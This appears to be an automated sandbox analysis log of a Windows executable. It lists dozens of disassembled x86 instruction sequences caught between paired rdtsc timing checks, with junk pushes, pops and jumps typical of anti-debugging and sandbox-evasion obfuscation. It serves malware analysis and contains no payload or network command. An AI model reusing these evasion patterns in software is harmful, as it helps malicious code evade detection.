Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77535D second address: 775395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e js 00007FA1CCCD2148h 0x00000014 mov ebx, eax 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D3423h], edx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D2945h], ecx 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 jc 00007FA1CCCD214Ch 0x0000002e je 00007FA1CCCD2146h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7770FD second address: 777103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77919A second address: 7791A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779778 second address: 77977C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77977C second address: 7797F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1CCCD2156h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push ebx 0x00000010 mov ebx, esi 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA1CCCD2148h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FA1CCCD2148h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c jmp 00007FA1CCCD214Eh 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pushad 0x00000056 popad 0x00000057 pop eax 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7797F7 second address: 7797FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7D6 second address: 77C7DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7DB second address: 77C7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA1CCF9D8BCh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7F2 second address: 77C7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F751 second address: 71F76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CDAB second address: 77CDE2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FA1CCCD2152h 0x0000000d jne 00007FA1CCCD214Ch 0x00000013 nop 0x00000014 push esi 0x00000015 mov ebx, edx 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov edi, eax 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D1A9Dh], esi 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jno 00007FA1CCCD2148h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CDE2 second address: 77CDF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CDF3 second address: 77CDF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DDC0 second address: 77DDCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA1CCF9D8BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DDCE second address: 77DDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DDDA second address: 77DDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DDDE second address: 77DDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DDE4 second address: 77DE21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA1CCF9D8C1h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jnc 00007FA1CCF9D8BCh 0x00000012 mov bx, ax 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a mov ebx, dword ptr [ebp+1247608Ch] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jo 00007FA1CCF9D8B6h 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DE21 second address: 77DE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DE27 second address: 77DE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E067 second address: 77E07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD2150h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E07C second address: 77E081 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 788741 second address: 788753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ebx 0x0000000a jng 00007FA1CCCD2146h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 788753 second address: 78875B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787EBA second address: 787EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787EBF second address: 787EF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 ja 00007FA1CCF9D8C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCF9D8C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787EF7 second address: 787EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787EFB second address: 787F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787F04 second address: 787F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007FA1CCCD214Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7881AB second address: 7881B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789ED6 second address: 789EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789EE9 second address: 789EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789EFD second address: 789F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA1CCCD2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789F07 second address: 789F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 721231 second address: 72124C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCCD2155h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72124C second address: 72125A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1CCF9D8B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72125A second address: 721292 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FA1CCCD2185h 0x0000000e jmp 00007FA1CCCD2150h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCCD2152h 0x0000001a jp 00007FA1CCCD2146h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7901E9 second address: 7901ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 790315 second address: 790348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FA1CCCD2152h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jo 00007FA1CCCD2146h 0x00000016 popad 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007FA1CCCD214Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 790348 second address: 79034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79034C second address: 790379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e js 00007FA1CCCD2146h 0x00000014 jl 00007FA1CCCD2146h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795715 second address: 795719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795719 second address: 79571D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79571D second address: 795753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007FA1CCF9D8B6h 0x00000012 jc 00007FA1CCF9D8B6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007FA1CCF9D8B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795753 second address: 795786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA1CCCD214Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FA1CCCD2150h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007FA1CCCD2146h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795786 second address: 795792 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 794A18 second address: 794A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1CCCD2146h 0x0000000a jg 00007FA1CCCD2146h 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 794A2F second address: 794A51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 794C9E second address: 794CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA1CCCD2157h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79523E second address: 795254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795254 second address: 795289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCCD2158h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FA1CCCD2152h 0x00000016 jng 00007FA1CCCD2146h 0x0000001c jc 00007FA1CCCD2146h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795289 second address: 795290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795571 second address: 795577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795577 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FA1CCF9D8C7h 0x0000000b jmp 00007FA1CCF9D8C1h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FA1CCF9D8B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79559C second address: 7955C5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FA1CCCD2159h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955C5 second address: 7955C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B2C7 second address: 79B2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B2D6 second address: 79B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B2DA second address: 79B2F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FA1CCCD214Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799DB1 second address: 799DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A181 second address: 79A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A193 second address: 79A197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A197 second address: 79A1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1CCCD2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA1CCCD214Eh 0x00000012 ja 00007FA1CCCD2146h 0x00000018 jmp 00007FA1CCCD2151h 0x0000001d jg 00007FA1CCCD2146h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A1D0 second address: 79A1F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BAh 0x00000009 jmp 00007FA1CCF9D8C7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A7B8 second address: 79A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B15C second address: 79B180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCF9D8C5h 0x0000000c jns 00007FA1CCF9D8B8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799A8B second address: 799A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79ED04 second address: 79ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79ED0A second address: 79ED10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761B6F second address: 761B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761B76 second address: 761B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761B7B second address: 761BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FA1CCF9D8C8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jnc 00007FA1CCF9D8B6h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761BBD second address: 761BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761BD5 second address: 761BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761BDA second address: 761BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761BE0 second address: 761BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761BE4 second address: 761C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov cx, 7FA1h 0x0000000d mov edx, 643B4C6Fh 0x00000012 push 24F96CC8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a jno 00007FA1CCCD2146h 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761C05 second address: 761C0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7620A4 second address: 7620AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76242A second address: 762430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762430 second address: 7624BF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 0000001Eh 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FA1CCCD2148h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 jmp 00007FA1CCCD2157h 0x00000048 nop 0x00000049 jmp 00007FA1CCCD214Ch 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jnl 00007FA1CCCD2146h 0x00000058 jmp 00007FA1CCCD2155h 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76279D second address: 7627A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7627A2 second address: 7627EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA1CCCD2152h 0x00000011 popad 0x00000012 pop ecx 0x00000013 nop 0x00000014 je 00007FA1CCCD214Ch 0x0000001a mov edi, dword ptr [ebp+122D1A44h] 0x00000020 lea eax, dword ptr [ebp+12478321h] 0x00000026 mov ecx, esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA1CCCD2151h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F27C second address: 79F284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F284 second address: 79F288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F288 second address: 79F28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F406 second address: 79F40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
